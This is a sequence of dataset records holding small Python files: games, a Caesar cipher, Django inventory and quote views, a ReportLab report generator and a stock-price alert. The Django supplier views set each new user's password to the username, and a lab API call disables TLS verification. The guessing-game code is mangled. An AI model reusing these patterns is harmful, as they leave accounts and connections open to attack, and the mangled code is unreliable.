1\n print(action_opts)\n return action_opts\n\n def save(self, path, cfglist, include_loaded=True):\n \"\"\"Save a key=val list of options to path, if include_loaded=True\n ALL prev. loaded options will also be saved.\n Return path on success, False on error.\"\"\"\n if include_loaded is True and self._loaded_config is not None:\n self._our_config = self._loaded_config\n else:\n self._our_config = configparser.ConfigParser(delimiters=('=',), strict=False)\n if not self._our_config.has_section('fs-uae'):\n self._our_config['fs-uae'] = {}\n self._our_fsconfig = self._our_config['fs-uae']\n for cfg in cfglist:\n key, val = cfg.split('=', 1)\n self._our_fsconfig[key.strip()] = val.strip()\n if not path.endswith('.fs-uae'):\n path += '.fs-uae'\n try:\n with open(path, 'wt') as f:\n self._our_config.write(f)\n except OSError:\n return False\n else:\n self._loaded_config = self._our_config\n self._loaded_configfile = path\n return path\n\n def remove_action(self, action):\n \"\"\"Remove an action from the loaded configuration.\"\"\"\n if self.loaded_config is None:\n return\n self.loaded_config.remove_option('fs-uae', action)\n\nif '__name__' == '__main__':\n import os\n os.chdir('/tmp')\n c = ConfigHandler()\n a = c.load(os.path.expanduser('~/FS-UAE/Configurations/Host.fs-uae'))\n print(a)\n","repo_name":"sonnenscheinchen/fsactioneditor","sub_path":"fsactionedit/confighandler.py","file_name":"confighandler.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"73134218538","text":"import random\n\nprint(\"Welcome to Rock Paper Scissor!\\n\")\nend = False\nwhile not end:\n print(\"What do you choose?\\n\")\n enemyChoice = random.randint(0,2)\n player_Choice = int(input(\"0 for ROCK, 1 for PAPER, 2 for SCISSOR\\n\"))\n while (player_Choice != 0) and (player_Choice != 1) and (player_Choice != 2):\n player_Choice = input(\"0 for ROCK, 1 for PAPER, 2 for SCISSOR\\n\")\n # 0 = 0, 0 < 1, 0 > 2\n # 1 > 1, 1 = 1, 1 < 2\n # 2 < 0, 2 > 1, 2 = 2\n if player_Choice == 0:\n if enemyChoice == 0:\n print(\"You picked ROCK and the bot picked ROCK, it's a tie!\\n\")\n elif enemyChoice == 1:\n print(\"You picked ROCK and the bot picked PAPER, you lose!\\n\")\n elif enemyChoice == 2:\n print(\"You picked ROCK and the bot picked SCISSOR, you win!\\n\")\n elif player_Choice == 1:\n if enemyChoice == 0:\n print(\"You picked PAPER and the bot picked ROCK, you win!\\n\")\n elif enemyChoice == 1:\n print(\"You picked PAPER and the bot picked PAPER, it's a tie!\\n\")\n elif enemyChoice == 2:\n print(\"You picked PAPER and the bot picked SCISSOR, you lose!\\n\")\n else:\n if enemyChoice == 0:\n print(\"You picked SCISSOR and the bot picked ROCK, you lose!\\n\")\n elif enemyChoice == 1:\n print(\"You picked SCISSOR and the bot picked PAPER, you win!\\n\")\n elif enemyChoice == 2:\n print(\"You picked SCISSOR and the bot picked SCISSOR, it's a tie!\\n\")\n print(\"Do you want to play again?\")\n keepPlaying = input(\"Y for YES, N for NO\\n\").upper()\n if keepPlaying == \"N\":\n end = True\nprint(\"Thanks for playing!\")","repo_name":"myang5128/python_projects","sub_path":"Rock Paper Scissors.py","file_name":"Rock Paper Scissors.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"18540138879","text":"n=int(input())\n\nprime = []\n\nfor i in range(11,55556,2):\n flag = True\n for j in range(2,int(i**0.5)+1):\n if i%j==0:\n flag=False\n break\n if flag:\n prime.append(i)\n \nprime_mod1 = []\n\nfor i in prime:\n if i%5==1:\n prime_mod1.append(i)\nprint(*prime_mod1[:n])","repo_name":"Aasthaengg/IBMdataset","sub_path":"Python_codes/p03362/s745166873.py","file_name":"s745166873.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"28156697732","text":"import random\r\n\r\nguessTaken=0\r\n\r\nprint('Hello! Whats your name?')\r\nname=input()\r\n\r\nnumber = random.randint(1,50)\r\nprint('Well '+name+' I am thinking of a number between 1 and 50.')\r\n\r\nfor guessTaken in range(6):\r\n print(\"Take a guess.\")\r\n guess = input()\r\n guess = int(guess)\r\n\r\n if(guessnumber*2):\r\n print(\"Oh! You went too far\")\r\n elif(guess90) and (ord(i)<97 or ord(i)>122):\r\n output+=i\r\n continue\r\n if (ord(i)+1)>=97 and (ord(i)+1)<=122 or (ord(i)+1>=65 and ord(i)+1<=90):\r\n output+=chr(ord(i)+1)\r\n if (ord(i)+1)>122:\r\n output+=chr(ord(i)-122+97)\r\n if (ord(i)+1)>90 and ord(i)<97:\r\n output+=chr(ord(i)-90+65)\r\n return \"\".join(output)\r\n \r\n#CeasarCipherDec - decrypts the string\r\ndef CeasarCipherDec(word):\r\n output=[]\r\n for i in word:\r\n n=ord(i)\r\n if (ord(i)<65 or ord(i)>90) and (ord(i)<97 or ord(i)>122):\r\n output+=i\r\n continue\r\n if (ord(i)-1)>=65 and (ord(i)-1)<=90 or (ord(i)-1>=97 and ord(i)-1<=122):\r\n output+=chr(ord(i)-1)\r\n if (ord(i)-1)<97 and (ord(i)-1)>90:\r\n output+=chr(ord(i)+90-65)\r\n if (ord(i)-1)<65:\r\n output+=chr(ord(i)+122-97)\r\n return \"\".join(output)\r\n\r\nif __name__ == '__main__':\r\n txt=input(\"Enter your text: \")\r\n a=CeasarCipher(txt)\r\n print(a)\r\n print(CeasarCipherDec(a))","repo_name":"darkblaro/Python-code-samples","sub_path":"ceasarCipher.py","file_name":"ceasarCipher.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"11083068747","text":"from config import *\nfrom utilities import *\nfrom Labs import getIdLab\nimport json\n\ndef createLinks():\n id_labs = getIdLab('create link in')\n print(\"id lab: {}\".format(id_labs))\n endpoint = \"/labs/{}/links\".format(id_labs)\n URL = url(endpoint)\n src_int = input(\"src_int: \")\n dst_int = input(\"dst_int: \")\n\n data = json.dumps({\n 'src_int': src_int,\n 'dst_int': dst_int\n })\n\n print(\"Creating links in lab with id {}...\".format(id_labs))\n resp = req.post(URL, headers=headers, data=data, verify=False)\n print(resp.text)","repo_name":"Theman49/mini-project-msib","sub_path":"Links.py","file_name":"Links.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"23645387573","text":"def solution(participant, completion):\n p = check(participant)\n c = check(completion)\n for name in c:\n if p.get(name):\n if c.get(name) == p.get(name):\n p.pop(name)\n for name in p:\n answer = name\n return answer\n\ndef check(checkList):\n result = {}\n for each in checkList:\n if result.get(each):\n result[each] = result.get(each) + 1\n else:\n result[each] = 1\n return result\n","repo_name":"chomh168/beakjoon","sub_path":"programmers/해시/p_해시_1/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9739055975","text":"import time\nfrom django.shortcuts import render\nfrom django.contrib import messages\nfrom django.contrib.auth import get_user_model\nfrom django.shortcuts import redirect\nfrom django.db.models import Q\nfrom django.utils.translation import gettext_lazy as _\nfrom core.models import *\nfrom core.forms import *\n\ndef dashboard(request):\n return render(request, 'dashboard.html')\n\ndef category_list(request):\n return render(request, 'category/list.html', {\n \"categories\": Category.objects.all(),\n })\n\ndef category_add(request):\n if request.method == 'POST':\n form = CategoryAddForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request, _(\"Success\"))\n return redirect('category_list')\n \n return render(request, 'category/add.html', {\n 'form': CategoryAddForm,\n })\n\ndef category_edit(request, pk):\n category = Category.objects.get(id=pk)\n\n if request.method == 'POST':\n form = CategoryAddForm(request.POST, request.FILES, instance=category)\n if form.is_valid():\n form.save()\n messages.success(request, _(\"Success\"))\n return redirect('category_list')\n else:\n messages.error(request, form.errors)\n return redirect('./')\n \n\n return render(request, 'category/edit.html', {\n 'form': CategoryAddForm(request.POST or None, instance=category)\n })\n\ndef category_delete(request, pk):\n Category.objects.get(id=pk).delete()\n time.sleep(1)\n return redirect('category_list')\n\ndef product_list(request):\n return render(request, 'product/list.html', {\n \"products\": Product.objects.all(),\n })\n\ndef product_add(request):\n if request.method == 'POST':\n form = ProductAddForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n messages.success(request, _(\"Success\"))\n return redirect('product_list')\n else:\n messages.error(request, form.errors)\n return redirect('product_add')\n \n return render(request, 'product/add.html', {\n 'form': ProductAddForm,\n })\n\ndef product_edit(request, pk):\n product = Product.objects.get(id=pk)\n\n if request.method == 'POST':\n form = ProductAddForm(request.POST, request.FILES, instance=product)\n if form.is_valid():\n form.save()\n messages.success(request, _(\"Success\"))\n return redirect('product_list')\n else:\n messages.error(request, form.errors)\n return redirect('./')\n \n\n return render(request, 'product/edit.html', {\n 'form': ProductAddForm(request.POST or None, instance=product)\n })\n\ndef product_delete(request, pk):\n Product.objects.get(id=pk).delete()\n time.sleep(1)\n return redirect('product_list')\n\ndef supplier_list(request):\n return render(request, 'supplier/list.html', {\n \"suppliers\": Supplier.objects.all(),\n })\n\ndef supplier_add(request):\n if request.method == 'POST':\n form = SupplierAddForm(request.POST, request.FILES)\n account = request.POST['id_supplier']\n if form.is_valid():\n supplier = form.save()\n user = get_user_model().objects.create(username=account)\n user.set_password(account)\n user.save()\n supplier.account = user\n supplier.save()\n messages.success(request, _(\"Success\"))\n return redirect('supplier_list')\n else:\n messages.error(request, form.errors)\n return redirect('supplier_add')\n \n return render(request, 'supplier/add.html', {\n 'form': SupplierAddForm,\n })\n\ndef supplier_edit(request, pk):\n supplier = Supplier.objects.get(id=pk)\n user = get_user_model().objects.get(id=supplier.account.id)\n if request.method == 'POST':\n form = SupplierAddForm(request.POST, request.FILES, instance=supplier)\n print(request.POST)\n if form.is_valid():\n supplier = form.save()\n supplier.account = user\n supplier.save()\n messages.success(request, _(\"Success\"))\n return redirect('supplier_list')\n else:\n messages.error(request, form.errors)\n return redirect('./')\n \n\n return render(request, 'supplier/edit.html', {\n 'form': SupplierAddForm(request.POST or None, instance=supplier)\n })\n\ndef supplier_delete(request, pk):\n get_user_model().objects.get(id=Supplier.objects.get(id=pk).account.id).delete()\n time.sleep(1)\n return redirect('supplier_list')\n\ndef reg_prd_view(request):\n user = get_user_model().objects.get(id=request.user.id)\n\n if request.method == 'POST':\n product_ids = [int(x) for x in request.POST['product_ids']]\n supplier = Supplier.objects.get(account=user)\n products = [Product.objects.get(id=product_id) for product_id in product_ids]\n for product in supplier.products.all():\n products.append(product)\n supplier.products.set(products)\n\n return render(request, 'supplier/reg_prd.html', {\n \"products\": Product.objects.all(),\n })\n\ndef un_reg_prd(request, pk):\n user = get_user_model().objects.get(id=request.user.id)\n\n if request.method == 'POST':\n supplier = Supplier.objects.get(account=user)\n products = supplier.products.all().filter(~Q(id=pk))\n supplier.products.set(products)\n\n return redirect('reg_prd_view')\n\n\ndef reg_prd(request, pk):\n print('ok')\n user = get_user_model().objects.get(id=request.user.id)\n\n if request.method == 'POST':\n supplier = Supplier.objects.get(account=user)\n products = [x for x in supplier.products.all()]\n products.append(Product.objects.get(id=pk))\n supplier.products.set(products)\n\n # time.sleep(1)\n return redirect('reg_prd_view')\n\ndef quote_list(request):\n quotes = POrder.objects.all()\n quotes_filter = []\n for quote in quotes:\n if quote.porderdetail_set.all().count() > 0:\n quotes_filter.append(quote)\n return render(request, 'quote/list.html', {\n \"quotes\": quotes_filter,\n })\n\ndef quote_add(request):\n if request.method == 'POST':\n supplier_id = request.POST.get('create_with_supplier')\n if not supplier_id:\n return redirect('quote_add')\n supplier = Supplier.objects.get(id=supplier_id)\n porder = POrder.objects.create(\n supplier = supplier,\n )\n return redirect('quote_edit', pk=porder.id)\n \n return render(request, 'quote/add.html', {\n 'form': QuoteAddForm,\n \"products\": Product.objects.all(),\n })\n\ndef quote_edit(request, pk):\n supplier = Supplier.objects.get(account = request.user)\n quote = POrder.objects.get(id=pk)\n product_quote_detail = [x.product for x in quote.porderdetail_set.all()]\n if request.method == 'POST':\n supplier_id = request.POST.get('edit_with_supplier')\n if not supplier_id:\n messages.warning(request, 'Must have a supplier')\n return redirect('quote_edit', quote.id)\n supplier_more = Supplier.objects.get(id=supplier_id)\n quote.supplier = supplier_more\n quote.save()\n return redirect('quote_edit', pk=quote.id)\n \n return render(request, 'quote/edit.html', {\n 'quote': quote,\n 'product_quote_detail': product_quote_detail,\n 'form': QuoteAddForm(request.POST or None, instance=quote),\n 'products': quote.supplier.products.all(),\n 'quote_details': quote.porderdetail_set.all(),\n })\n\ndef quote_detail_edit_save(request, pk):\n quote_detail = POrderDetail.objects.get(id=pk)\n quote = quote_detail.porder\n quote_detail.quantity = request.POST.get('quantity') or 1\n quote_detail.save()\n return redirect('quote_edit', pk=quote.id)\n\n\ndef quote_add_detail(request, quote_id, product_id):\n quantity = request.POST.get('quantity')\n quote = POrder.objects.get(id=quote_id)\n product = Product.objects.get(id=product_id)\n POrderDetail.objects.create(\n porder=quote,\n product=product,\n )\n return redirect('quote_edit', pk=quote.id)\n\ndef quote_remove_detail(request, quote_id, product_id):\n quote = POrder.objects.get(id=quote_id)\n product = Product.objects.get(id=product_id)\n POrderDetail.objects.get(porder=quote, product=product).delete()\n return redirect('quote_edit', pk=quote.id)\n \n\ndef quote_add_before(request, pk):\n product = Product.objects.get(id=pk)\n supplier_id = request.POST.get('supplier_more')\n if not supplier_id:\n messages.error(request, \"Must choose supplier\")\n return redirect('quote_add')\n supplier = Supplier.objects.get(id=supplier_id)\n porder = POrder.objects.create(\n supplier = supplier,\n )\n print(porder)\n porder_detail = POrderDetail.objects.create(\n product = product,\n porder = POrder.objects.get(id=porder.id),\n quantity = 1,\n )\n\n # time.sleep(1)\n return redirect('quote_edit', pk=porder.id)\n\ndef quote_s_list(request):\n supplier = Supplier.objects.get(account = request.user)\n return render(request, 'quote/s_list.html', {\n 'quotes': POrder.objects.filter(~Q(status='draft'), supplier=supplier).order_by('-id'),\n })\n\ndef quote_s_quote(request, pk):\n quote = POrder.objects.get(id=pk)\n return render(request, 'quote/s_quote.html', {\n 'quote': quote,\n 'quote_details': quote.porderdetail_set.all(), \n })\n\ndef quote_s_quote_update(request, pk):\n quote_detail = POrderDetail.objects.get(id=pk)\n quote_detail.price = request.POST.get('price')\n if quote_detail.price == None or quote_detail.price == \"\":\n messages.warning(request, _(\"Enter price befor update it\"))\n return redirect('quote_s_quote', quote_detail.porder.id)\n quote_detail.save()\n return redirect('quote_s_quote', quote_detail.porder.id)\n\ndef quote_delete(request, pk):\n POrder.objects.get(id=pk).delete()\n time.sleep(1)\n return redirect('quote_list')\n\n\ndef quote_request(request, pk):\n quote = POrder.objects.get(id=pk)\n quote.status = 'new'\n quote.save()\n messages.success(request, _('Send request successfully'))\n return redirect('quote_list')\n\ndef quote_reject(request, pk):\n quote = POrder.objects.get(id=pk)\n if request.POST.get('note') is not None:\n quote.note = request.POST.get('note')\n quote.status = 'reject'\n quote.save()\n messages.warning(request, _('Reject request sent'))\n return redirect('quote_s_list')","repo_name":"huoquandace/IM2","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"14433522853","text":"from reportlab.pdfgen import canvas \nfrom reportlab.platypus import Paragraph, Frame\n# from reportlab import platypus\n# from reportlab.lib.styles import ParagraphStyle as PS\nfrom reportlab.pdfbase.ttfonts import TTFont\nfrom reportlab.pdfbase import pdfmetrics\n# from reportlab.lib import colors\nfrom math import sqrt\nfrom math import ceil\n\n\n\ndef GetReport(text,NumPages,NumChannel,NumVideo,region,start_time):\n\n # ------------------------------------------------------------------------\n BarChannelAge=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarChannelAge\")+\".png\"\n BarChannelViews=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarChannelViews\")+\".png\"\n BarChannelSubscribers=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarChannelSubscribers\")+\".png\"\n BarChannelVideos=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarChannelVideos\")+\".png\"\n BarVideoAges=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarVideoAges\")+\".png\"\n BarVideoDuration=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarVideoDuration\")+\".png\"\n BarVideoViews=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_BarVideoViews\")+\".png\"\n ScatViewsLikes=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_ScatViewsLikes\")+\".png\"\n ScatLikesDislikes=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_ScatLikesDislikes\")+\".png\"\n ScatViewsComments=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_ScatViewsComments\")+\".png\"\n HorizontalBarOverview=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_HorizontalBarOverview\")+\".png\"\n HorizontalBarAll4=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_HorizontalBarAll4\")+\".png\"\n TableChannel=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_TableChannel\")+\".png\"\n TableVideos=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_TableVideos\")+\".png\"\n TableThumbnail=\"Images/\"+str(text)+\"/Charts/\"+str(str(text)+\"_TableThumbnails\")+\".png\"\n\n\n\n # ------------------------------------------------------------------------\n\n\n fileName = 'Analystics-RoYR-'+str(text)+'.pdf'\n documentTitle = 'Analystics-RoYR-'+str(text)\n title = 'Relevance of Youtube Relevance'\n subtitle=\"Analysis of a random youtube search from a non personalized account.\"\n pdfmetrics.registerFont(TTFont('OurFont', 'Nirmala.ttf'))\n pdf = canvas.Canvas(fileName)\n\n # print(pdf.getAvailableFonts())\n pdf.setTitle(documentTitle)\n # drawMyRuler(pdf)\n def drawMyRuler(pdf):\n pdf.setFont('Helvetica', 4)\n pdf.drawString(0,830, str((0,830)))\n x=50\n while(x<=550):\n pdf.drawString(x,830, str((x,830)))\n x+=50\n pdf.drawString(575,830, str((575,830)))\n pdf.drawString(0,10, str((0,10)))\n y=50\n while(y<=800):\n pdf.drawString(0,y, str((0,y)))\n y=y+50 \n\n def TitleText():\n pdf.setFillColorRGB(255, 0, 0)\n pdf.setFont('Helvetica-Bold',8)\n\n def ResultText():\n pdf.setFillColorRGB(0, 0, 0)\n pdf.setFont('Helvetica',8)\n\n def HeaderText1():\n pdf.setFillColorRGB(0, 0, 0)\n pdf.setFont('Helvetica-Bold',12)\n\n def HeaderText2():\n pdf.setFillColorRGB(0, 0, 0)\n pdf.setFont('Helvetica-Bold',10)\n # ------------------------------------------------------------------------\n pdf.setFont('Helvetica-Bold',24)\n pdf.drawCentredString(290, 790, title)\n HeaderText2()\n pdf.drawCentredString(290, 770, subtitle)\n subtitle=\"By Sarthak Arora\"\n pdf.drawCentredString(290, 755, subtitle)\n\n items = []\n link = 'Send Email'\n items.append(Paragraph(link))\n f = Frame(200, 730, 70, 25, showBoundary=0)\n f.addFromList(items, pdf)\n\n items = []\n link = 'Github'\n items.append(Paragraph(link))\n f = Frame(270, 730, 50, 25, showBoundary=0)\n f.addFromList(items, pdf)\n\n items = []\n link = 'LinkedIn'\n items.append(Paragraph(link))\n f = Frame(320, 730, 50, 25, showBoundary=0)\n f.addFromList(items, pdf)\n # ------------------------------------------------------------------------\n\n \n xoverview=50\n yoverview=700\n pdf.line(50, yoverview+20, 530, yoverview+20)\n TitleText()\n pdf.drawString(xoverview, yoverview, \"String Searched\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview, \": \"+str(text))\n TitleText()\n pdf.drawString(xoverview, yoverview-10, \"Pages Searched\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-10, \": \"+str(NumPages))\n TitleText()\n pdf.drawString(xoverview, yoverview-20, \"Channels Searched\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-20, \": \"+str(NumChannel))\n TitleText()\n pdf.drawString(xoverview, yoverview-30, \"Videos Searched\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-30, \": \"+str(NumVideo))\n TitleText()\n pdf.drawString(xoverview, yoverview-40, \"Country Origin\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-40, \": \"+str(region))\n TitleText()\n pdf.drawString(xoverview, yoverview-50, \"Date and Time\")\n ResultText()\n pdf.drawString(xoverview+80, yoverview-50, \": \"+str(start_time))\n pdf.line(50, yoverview-70, 530, yoverview-70)\n\n\n # ------------------------------------------------------------------------\n\n ytables=yoverview-100\n HeaderText2()\n header=\"Top channels, categories and topics from channels in top search results\"\n pdf.drawInlineImage(TableChannel, 10, ytables-190, height=200,width=200*2.77)\n pdf.drawCentredString(290, ytables, header)\n\n\n\n ytables=ytables-190\n\n header=\"Top topics, categories and tags from videos in top search results\"\n pdf.drawInlineImage(TableVideos, 10, ytables-190, height=200,width=200*2.77)\n pdf.drawCentredString(290, ytables, header)\n\n ytables=ytables-190\n header=\"Various aspects of top search results\"\n pdf.drawInlineImage(HorizontalBarOverview, 50, ytables-165, height=150,width=150*3.2)\n pdf.drawCentredString(290, ytables, header)\n\n pdf.showPage()\n\n # ------------------------------------------------------------------------\n HeaderText2()\n ybar=800\n xbar1=7\n xbar2=xbar1+300\n header1=\"Age of channels in top search results\"\n header2=\"Video count of channels in top search results\"\n pdf.drawInlineImage(BarChannelAge, xbar1, ybar-160, height=140,width=280)\n pdf.drawInlineImage(BarChannelVideos, xbar2, ybar-160, height=140,width=280)\n pdf.drawCentredString(xbar1+150, ybar, header1)\n pdf.drawCentredString(xbar2+150, ybar, header2)\n\n ybar=ybar-200\n\n header1=\"Subscriber count of channels in top search results\"\n header2=\"View count of channels in top search results\"\n pdf.drawInlineImage(BarChannelSubscribers, xbar1, ybar-160, height=140,width=280)\n pdf.drawInlineImage(BarChannelViews, xbar2, ybar-160, height=140,width=280)\n pdf.drawCentredString(xbar1+150, ybar, header1)\n pdf.drawCentredString(xbar2+150, ybar, header2)\n\n ybar=ybar-200\n\n header1=\"Views of videos in top search results\"\n header2=\"Age of videos in top search results\"\n pdf.drawInlineImage(BarVideoViews, xbar1, ybar-160, height=140,width=280)\n pdf.drawInlineImage(BarVideoAges, xbar2, ybar-160, height=140,width=280)\n pdf.drawCentredString(xbar1+150, ybar, header1)\n pdf.drawCentredString(xbar2+150, ybar, header2)\n\n ybar=ybar-200\n header1=\"Length of videos in top search results\"\n pdf.drawInlineImage(BarVideoDuration, xbar1+150, ybar-160, height=140,width=280)\n pdf.drawCentredString(xbar1+300, ybar, header1)\n\n pdf.showPage()\n # ------------------------------------------------------------------------\n HeaderText2()\n yscatter=800\n xscatter=15\n header1=\"Views vs Likes in top search results\"\n pdf.drawInlineImage(ScatViewsLikes, xscatter+80, yscatter-230, height=220,width=220*1.73)\n pdf.drawCentredString(xscatter+275, yscatter, header1)\n\n header1=\"Likes vs Dislikes in top search results\"\n yscatter=yscatter-270\n pdf.drawInlineImage(ScatLikesDislikes, xscatter+80, yscatter-230, height=220,width=220*1.73)\n pdf.drawCentredString(xscatter+275, yscatter, header1)\n\n header1=\"Views vs Comments in top search results\"\n yscatter=yscatter-270\n pdf.drawInlineImage(ScatViewsComments, xscatter+80, yscatter-230, height=220,width=220*1.73)\n pdf.drawCentredString(xscatter+275, yscatter, header1)\n\n pdf.showPage()\n # ------------------------------------------------------------------------\n HeaderText1()\n yall=800\n xall=50\n header1=\"Detailed engagement of videos in top search results\"\n pdf.drawInlineImage(HorizontalBarAll4, xall, yall-670, height=500*1.27,width=500)\n pdf.drawCentredString(xall+240, yall, header1)\n # drawMyRuler(pdf)\n pdf.showPage()\n # ------------------------------------------------------------------------\n\n\n HeaderText1()\n header1=\"Analysis of thumbnails of videos in top search results\"\n pdf.drawCentredString(290, 800, header1)\n\n NumberImages=NumVideo\n factor=((sqrt(NumberImages/12)))\n NumRows=int(ceil(3*factor))\n NumColumns=int(ceil(4*factor))\n # print(NumRows, NumColumns)\n ImageWidth=480/NumColumns\n ImageHeight=360/NumRows\n y=770\n x=60\n count=1\n for i in range(NumRows):\n if count>NumberImages:\n break\n y=y-ImageHeight\n x=60\n for j in range(NumColumns):\n if count>NumberImages:\n break\n try:\n pdf.drawInlineImage(\"Images/\"+str(text)+\"/Thumbnails/\"+str(count)+\".jpg\", x, y, height=ImageHeight,width=ImageWidth)\n count+=1\n x=x+ImageWidth\n except:\n print(str(count)+\".jpg not available to put in collage\")\n\n\n y=370\n header=\"Top subjects present in thumbnails of videos in top search results\"\n pdf.drawInlineImage(TableThumbnail, 10, y-190, height=200,width=200*2.77)\n pdf.drawCentredString(300, y, header)\n\n\n\n pdf.save()","repo_name":"sarthak144/Relevance-Of-Youtube-Relevance","sub_path":"Report.py","file_name":"Report.py","file_ext":"py","file_size_in_byte":10056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"30102651954","text":"def has_repeating_number_within_distance(measurements, k):\n last_seen_index = {}\n for idx, measurement in enumerate(measurements):\n if measurement in last_seen_index and idx - last_seen_index[measurement] <= k:\n return True\n last_seen_index[measurement] = idx\n return False\n\n\nif __name__ == '__main__':\n n, k = map(int, input('Enter n and k: ').split())\n measurements = list(map(int, input('Enter measurements: ').split()))\n print('Yes' if has_repeating_number_within_distance(measurements, k) else 'No')\n","repo_name":"DmitryFedoroff/python","sub_path":"yandex-academy/open-lectures-2022/repeating-number/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"71675873897","text":"def devuelve_ciudades(*ciudades): #el a* antes del argumento señala que va a recibir un numero indeterminado de elemento yseran en forma de tupla\n\tfor elemento in ciudades:\n\t\t#yield elemento #este se usa para acceder a la tupla completa, o de manera habitual\n\t\t#for subElemento in elemento:\t#este for es si quisieramos ingresar en los elementos de la tupla\n\t\t#\tyield subElemento\t\t\t# junto con el yield\n\t\tyield from elemento #de esta forma nos ahorramos el segundo for\n\nciudades_devueltas=devuelve_ciudades(\"CDMX\", \"Guanajuato\", \"Michoacan\", \"Guadalajara\")#cada cadena, es guardada como una tupla, asi sirve el * anterior\n\nprint(next(ciudades_devueltas))\nprint(next(ciudades_devueltas))","repo_name":"JozhueBrown/python-test","sub_path":"generadores_II.py","file_name":"generadores_II.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17289315620","text":"import requests\nimport pandas as pd\n\nAA_KEY = ''\nAA_ENDPOINT = 'https://www.alphavantage.co/query'\n\n# Change the amount of days to fetch data from\nTIME_INTERVAL = 2\nDESIRED_PERCENTAGE = 0.01\n\n\n## STEP 1: Use https://www.alphavantage.co\n# When STOCK price increase/decreases by 5% between yesterday and the day before yesterday then print(\"Get News\").\n\nclass Stock:\n parameters = {\n 'function': 'TIME_SERIES_DAILY_ADJUSTED',\n 'symbol': '',\n 'apikey': AA_KEY,\n }\n\n def __init__(self):\n self.data = ''\n self.closing_prices = ''\n self.symbol = ''\n self.up_down = ''\n self.price_change = 0\n\n def get_stock_data(self):\n self.parameters['symbol'] = self.symbol\n response = requests.get(AA_ENDPOINT, self.parameters)\n response.raise_for_status()\n stock_data = response.json()[\"Time Series (Daily)\"]\n return stock_data\n \n\n def analise_stock_prices(self):\n self.initialize_stock()\n stock_prices_series = pd.Series(self.closing_prices)\n price_diference = (stock_prices_series.pct_change())\n # access the percentage diference in the pd series, if needed can be further changed to address more data\n self.price_change = round(abs(price_diference[1])*100)\n if price_diference[1] >= DESIRED_PERCENTAGE:\n self.up_down = '▲'\n return True\n elif price_diference[1] <= DESIRED_PERCENTAGE * -1:\n self.up_down = '▼'\n return True\n else:\n return False\n\n def fetch_closing_prices(self):\n data_list = [value for key, value in self.data.items()]\n prices_data = []\n for day in range(TIME_INTERVAL):\n prices_data.append(float(data_list[day][\"4. close\"]))\n return prices_data\n\n def initialize_stock(self):\n self.data = self.get_stock_data()\n self.closing_prices = self.fetch_closing_prices()\n","repo_name":"willianyamauti/Stock-Market-Alert","sub_path":"stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"27493123154","text":"import unittest\nfrom unittest.mock import Mock\n\nfrom test_tables import test_ids, insert_test_db\nfrom twissify.tables import TimelineIndex\nfrom twissify.storages import TimelineIndexStorage\n\n\nclass TestTimelineIndexStorage(unittest.TestCase):\n def test__create_existing_timeline_name(self):\n names = [\"home_timeline\", \"mentions_timeline\", \"retweets_of_me\"]\n ids = test_ids(names, 2)\n storage = TimelineIndexStorage(\"sqlite:///:memory:\")\n insert_test_db(names, ids, storage.session())\n for name in names:\n with self.subTest(name=name):\n with self.assertRaises(ValueError):\n storage._create(name)\n\n def test__update_no_existing_timeline_name(self):\n names = [\"home_timeline\", \"mentions_timeline\", \"retweets_of_me\"]\n ids = test_ids(names, 2)\n storage = TimelineIndexStorage(\"sqlite:///:memory:\")\n for name, (since_id, max_id) in zip(names, ids):\n with self.assertRaises(ValueError):\n storage._update(name, since_id=since_id, max_id=max_id)\n\n def test_create_ids(self):\n storage = TimelineIndexStorage(\"sqlite:///:memory:\")\n expectation_ids = {\"since_id\": 100, \"max_id\": 2000}\n names = [\"timeline\"]\n tweets = Mock(**expectation_ids)\n 